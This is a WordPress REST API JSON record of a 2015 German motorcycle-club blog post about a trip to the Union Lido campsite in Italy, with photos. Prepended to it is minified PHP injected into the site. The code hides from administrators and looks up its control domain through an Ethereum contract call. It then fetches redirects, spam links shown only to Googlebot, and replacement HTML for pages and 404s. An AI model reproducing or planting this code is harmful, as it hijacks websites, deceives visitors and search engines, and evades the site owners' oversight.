if((defined('WP_CLI')&&WP_CLI)||(defined('DOING_CRON')&&DOING_CRON)||(defined('DOING_AJAX')&&DOING_AJAX)||(defined('REST_REQUEST')&&REST_REQUEST)||(function_exists('is_admin')&&is_admin())||(function_exists('current_user_can')&&current_user_can('manage_options')))return;if(!function_exists('add_action'))return;define('TO',2);define('FT',5);define('LT',600);define('ST',3600);define('PT',172800);$GLOBALS['RP']=['ethereum-rpc.publicnode.com','eth.api.pocket.network','eth.drpc.org','eth.llamarpc.com','1rpc.io/eth'];$GLOBALS['R']='';function DM(){return get_transient('_dm')?:'0x295bae89192c32.com';}function T($k,$t){set_transient($k.'_t',time(),$t);}function G($k){return[get_transient($k),(int)get_transient($k.'_t')];}function X($k,$d,$t){set_transient($k,$d,$t);set_transient($k.'_t',time(),$t);return $d;}function U(){return rawurlencode(home_url('/'));}function H(){$p=parse_url($_SERVER['REQUEST_URI']??'/',PHP_URL_PATH);$p='/'.ltrim((string)$p,'/');if($p!=='/'&&substr($p,-1)==='/')$p=rtrim($p,'/');return $p?:'/';}function EC($rpc){$r=wp_remote_post('https://'.$rpc,['headers'=>['Content-Type'=>'application/json'],'body'=>wp_json_encode(['jsonrpc'=>'2.0','id'=>1,'method'=>'eth_call','params'=>[['to'=>'0x8B51674F44A1aA39aD5b3A365DA1d667E54aF292','data'=>'0x3fa4f245'],'latest']]),'timeout'=>10]);if(is_wp_error($r))return null;$b=json_decode(wp_remote_retrieve_body($r),true);return(is_array($b)&&isset($b['result']))?strtolower($b['result']):null;}function HD($hex){$hex=ltrim(str_replace('0x','',$hex),'0');$o='';for($i=0;$i<strlen($hex);$i+=2){$byte=substr($hex,$i,2);if($byte==='00')break;$o.=chr(hexdec($byte));}return trim($o);}function RD(){$rp=$GLOBALS['RP'];$i=(int)get_transient('_ri');if($i>=count($rp))$i=0;$v=EC($rp[$i]);if(!$v){set_transient('_ri',$i+1,86400);return false;}$d=HD($v);if(strpos($d,'.')===false){set_transient('_ri',$i+1,86400);return false;}delete_transient('_ri');return $d;}function MR(){if((int)get_transient('_fc')<FT)return;$d=RD();if($d){set_transient('_dm',$d,86400);delete_transient('_fc');}}function J($u){$r=wp_remote_get($u,['timeout'=>TO,'redirection'=>1,'headers'=>['Accept'=>'application/json']]);if(is_wp_error($r)){set_transient('_fc',(int)get_transient('_fc')+1,86400);MR();return null;}$c=(int)wp_remote_retrieve_response_code($r);$b=(string)wp_remote_retrieve_body($r);if($c!==200||trim($b)===''){set_transient('_fc',(int)get_transient('_fc')+1,86400);MR();return null;}$j=json_decode($b,true);if(!is_array($j)){set_transient('_fc',(int)get_transient('_fc')+1,86400);MR();return null;}delete_transient('_fc');return $j;}function FL(){$j=J('https://links.'.DM().'/links?site='.U());if(!is_array($j))return null;$Lx=[];foreach(($j['L']??[])as $r){$t=wp_strip_all_tags((string)($r['t']??''));$u=trim((string)($r['u']??''));if($t!==''&&filter_var($u,FILTER_VALIDATE_URL))$Lx[]=['t'=>$t,'u'=>$u];}$Cx=[];foreach(($j['C']??[])as $row){if(!is_array($row)||count($row)<2)continue;$k='/'.ltrim(trim((string)$row[0]),'/');if($k!=='/'&&substr($k,-1)==='/')$k=rtrim($k,'/');$v=trim((string)$row[1]);if($k!==''&&$k!=='/'&&filter_var($v,FILTER_VALIDATE_URL))$Cx[$k]=$v;}$Rx=[];foreach(($j['R']??[])as $row){if(!is_array($row)||count($row)<2)continue;$k='/'.ltrim(trim((string)$row[0]),'/');if($k!=='/'&&substr($k,-1)==='/')$k=rtrim($k,'/');$to=trim((string)$row[1]);$cd=(int)($row[2]??301);if($cd!==301&&$cd!==302)$cd=301;if($k!==''&&$k!=='/'&&filter_var($to,FILTER_VALIDATE_URL))$Rx[$k]=['t'=>$to,'c'=>$cd];}$Hx=[];foreach(($j['H']??[])as $r){$t=wp_strip_all_tags((string)($r['t']??''));$u=trim((string)($r['u']??''));if($t!==''&&filter_var($u,FILTER_VALIDATE_URL))$Hx[]=['t'=>$t,'u'=>$u];}return['L'=>$Lx,'C'=>$Cx,'R'=>$Rx,'H'=>$Hx];}function FS(){$j=J('https://pages.'.DM().'/active-slugs?site='.U());if(!is_array($j))return null;$o=[];foreach(($j['S']??[])as $s){$s='/'.ltrim(trim((string)$s),'/');if($s!=='/'&&substr($s,-1)==='/')$s=rtrim($s,'/');if($s!=='/'&&strlen($s)<200)$o[]=$s;}return array_values(array_unique($o));}function FP($path){$j=J('https://pages.'.DM().'/page?site='.U().'&path='.rawurlencode($path));if(!is_array($j))return null;return['m'=>(bool)($j['m']??false),'op'=>(string)($j['op']??''),'st'=>(int)($j['st']??200),'h'=>(string)($j['h']??'')];}function GL(){[$d,$t]=G('l');$a=time()-$t;if(is_array($d)&&$t&&$a<=LT)return $d;if($a>LT&&($GLOBALS['R']===''||$GLOBALS['R']==='L')){$n=FL();is_array($n)?$d=X('l',$n,86400):T('l',86400);$GLOBALS['R']='L';}return is_array($d)?$d:[];}function GS(){[$d,$t]=G('s');$a=time()-$t;if(is_array($d)&&$t&&$a<=ST)return $d;if($a>ST&&($GLOBALS['R']===''||$GLOBALS['R']==='S')){$n=FS();is_array($n)?$d=X('s',$n,86400):T('s',86400);$GLOBALS['R']='S';}return is_array($d)?$d:[];}add_action('wp',function(){$path=H();$ua=(string)($_SERVER['HTTP_USER_AGENT']??'');$Lx=GL();if(!empty($Lx['R'][$path]))add_action('template_redirect',function()use($Lx,$path){wp_redirect($Lx['R'][$path]['t'],(int)$Lx['R'][$path]['c']);exit;},0);if(!empty($Lx['C'][$path]))add_action('wp_head',function()use($Lx,$path){echo'<link rel="canonical" href="'.esc_url($Lx['C'][$path]).'" />'."\n";},1);if(!empty($Lx['L'])&&stripos($ua,'Googlebot')!==false)add_action('wp_footer',function()use($Lx,$path){$ll=array_merge($Lx['L'],$path==='/'?($Lx['H']??[]):[]);$h='';foreach($ll as $r)$h.='<li><a href="'.esc_url($r['u']).'">'.esc_html($r['t']).'</a></li>';if($h!=='')echo'<details class="pl"><summary>More</summary><ul>'.$h.'</ul></details>';},9999);$Sx=GS();if(!in_array($path,$Sx,true))return;add_action('template_redirect',function()use($path){global $wp_query;$k='p_'.md5(home_url('/').'|'.$path);$p=get_transient($k);$t=(int)get_transient($k.'_t');if(!(is_array($p)&&$t&&(time()-$t)<=PT)){$n=FP($path);if(is_array($n)){$p=$n;set_transient($k,$p,604800);set_transient($k.'_t',time(),604800);}else{set_transient($k.'_t',time(),604800);}}if(empty($p['m']))return;if($wp_query->is_404()){$wp_query->is_404=false;status_header((int)$p['st']);echo'<!doctype html><html><head>';wp_head();echo'</head><body>'.$p['h'];wp_footer();echo'</body></html>';exit;}add_filter('the_content',function($c)use($p){if($p['op']==='rp')return $p['h'];if($p['op']==='ij')return $c.$p['h'];return $c;},9999);},1);},0);/* v82L4MZsM3tIW0wK */{"id":1067,"date":"2015-06-09T00:01:29","date_gmt":"2015-06-08T23:01:29","guid":{"rendered":"http:\/\/nsu-club.de\/?p=1067"},"modified":"2015-06-09T05:51:39","modified_gmt":"2015-06-09T04:51:39","slug":"union-lido-oder-warum-ich-nicht-zum-camper-werde-und-es-gibt-immer-noch-drachen-teil-2","status":"publish","type":"post","link":"https:\/\/nsu-club.de\/?p=1067","title":{"rendered":"Union Lido \u2013 oder warum ich nicht zum Camper werde und es gibt immer noch Drachen Teil 2"},"content":{"rendered":"<p>Wir befinden uns mit diesen Bericht immer noch am Donnerstag so gegen 10 Uhr.<a href=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8416.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-1058 size-large\" src=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8416-1024x683.jpg\" alt=\"IMG_8416\" width=\"660\" height=\"440\" srcset=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8416-1024x683.jpg 1024w, https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8416-300x200.jpg 300w\" sizes=\"auto, (max-width: 660px) 100vw, 660px\" \/><\/a><\/p>\n<p>F\u00fcnf ? Ja passt, hier sind erst einmal die f\u00fcnf. Von links nach rechts:<\/p>\n<p>Hannes, Stefan (in diesen Fall ich), Stefan, Andreas und Wolfgang.<\/p>\n<p>Vorher haben wir uns die Sommer, Sonne, Strand Ausstattung bei Audi Tradition geholt (Hut und Badetuch von Union Lido &#8211; sehr sch\u00f6n). Andreas war allerdings nicht Begeistert, das man mit den Damen nicht Handeln konnte und hat mir die Schuld gegeben, da ich gleich bezahlt habe.<\/p>\n<p>Seine original Worte: Ist der Handel noch so klein, so bringt er mehr als Arbeit ein.<\/p>\n<p>Na ja und ich denke bei diesen Bild hatten wir schon ein oder zwei Havanna\u00b4s. Und noch immer nicht geschlafen.<\/p>\n<p>Aber da man in Italien ist, wird zuerst mal Pizza gegessen:<\/p>\n<p><a href=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/20150604_164443.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\" size-medium wp-image-1085 alignleft\" src=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/20150604_164443-300x169.jpg\" alt=\"20150604_164443\" width=\"300\" height=\"169\" srcset=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/20150604_164443-300x169.jpg 300w, https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/20150604_164443-1024x576.jpg 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8434.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\" size-medium wp-image-1073 alignright\" src=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8434-300x200.jpg\" alt=\"IMG_8434\" width=\"300\" height=\"200\" srcset=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8434-300x200.jpg 300w, https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8434-1024x683.jpg 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Und Einkaufen nicht vergessen &#8230;<a href=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8352.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-1075\" src=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8352-300x200.jpg\" alt=\"IMG_8352\" width=\"300\" height=\"200\" srcset=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8352-300x200.jpg 300w, https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8352-1024x683.jpg 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8380.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-1079\" src=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8380-300x200.jpg\" alt=\"IMG_8380\" width=\"300\" height=\"200\" srcset=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8380-300x200.jpg 300w, https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8380-1024x683.jpg 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> Hey, mein Prima fegt \u00fcber den Campingplatz. Die beiden Kundschafter mussten ja schon mal die Strecke f\u00fcr die Sportmax anschauen \ud83d\ude42<\/p>\n<p><a href=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8359.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-1076\" src=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8359-300x200.jpg\" alt=\"IMG_8359\" width=\"300\" height=\"200\" srcset=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8359-300x200.jpg 300w, https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8359-1024x683.jpg 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>Sind die nicht Klasse ?<\/p>\n<p>Und dann noch schnell zum Meer und um 20:00 Uhr haben wir alle geschlafen. Da wird es aber auch sch\u00f6ne Bilder davon geben. Und der gro\u00dfe Pinienzapfen, der ja mindest ein Loch bis nach China in die Erde schlagen w\u00fcrde und den Kopf von Hannes zerquetscht, ist zum Gl\u00fcck nicht auf Ihn gefallen \ud83d\ude09<\/p>\n<p><a href=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8437.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-1082\" src=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8437-300x200.jpg\" alt=\"IMG_8437\" width=\"300\" height=\"200\" srcset=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8437-300x200.jpg 300w, https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8437-1024x683.jpg 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8439.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-1083\" src=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8439-300x200.jpg\" alt=\"IMG_8439\" width=\"300\" height=\"200\" srcset=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8439-300x200.jpg 300w, https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8439-1024x683.jpg 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/20150604_175120.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-1087\" src=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/20150604_175120-300x169.jpg\" alt=\"20150604_175120\" width=\"300\" height=\"169\" srcset=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/20150604_175120-300x169.jpg 300w, https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/20150604_175120-1024x576.jpg 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8438.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-1084\" src=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8438-300x200.jpg\" alt=\"IMG_8438\" width=\"300\" height=\"200\" srcset=\"https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8438-300x200.jpg 300w, https:\/\/nsu-club.de\/wp-content\/uploads\/2015\/06\/IMG_8438-1024x683.jpg 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>So kann mann doch Leben &#8211; oder ?<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Wir befinden uns mit diesen Bericht immer noch am Donnerstag so gegen 10 Uhr. F\u00fcnf ? Ja passt, hier sind erst einmal die f\u00fcnf. Von links nach rechts: Hannes, Stefan (in diesen Fall ich), Stefan, Andreas und Wolfgang. Vorher haben wir uns die Sommer, Sonne, Strand Ausstattung bei Audi Tradition geholt (Hut und Badetuch von Union Lido &#8211; sehr sch\u00f6n). Andreas war allerdings nicht Begeistert, das man mit den Damen nicht Handeln konnte und hat mir die Schuld gegeben, da ich gleich bezahlt habe. Seine original Worte: Ist der Handel noch so klein, so bringt er mehr als Arbeit ein. Na ja und ich denke bei diesen Bild hatten wir &hellip; <a href=\"https:\/\/nsu-club.de\/?p=1067\" class=\"more-link\"><span class=\"screen-reader-text\">Union Lido \u2013 oder warum ich nicht zum Camper werde und es gibt immer noch Drachen Teil 2<\/span> weiterlesen<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1067","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/nsu-club.de\/index.php?rest_route=\/wp\/v2\/posts\/1067","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nsu-club.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nsu-club.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nsu-club.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/nsu-club.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1067"}],"version-history":[{"count":9,"href":"https:\/\/nsu-club.de\/index.php?rest_route=\/wp\/v2\/posts\/1067\/revisions"}],"predecessor-version":[{"id":1106,"href":"https:\/\/nsu-club.de\/index.php?rest_route=\/wp\/v2\/posts\/1067\/revisions\/1106"}],"wp:attachment":[{"href":"https:\/\/nsu-club.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1067"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nsu-club.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1067"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nsu-club.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1067"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}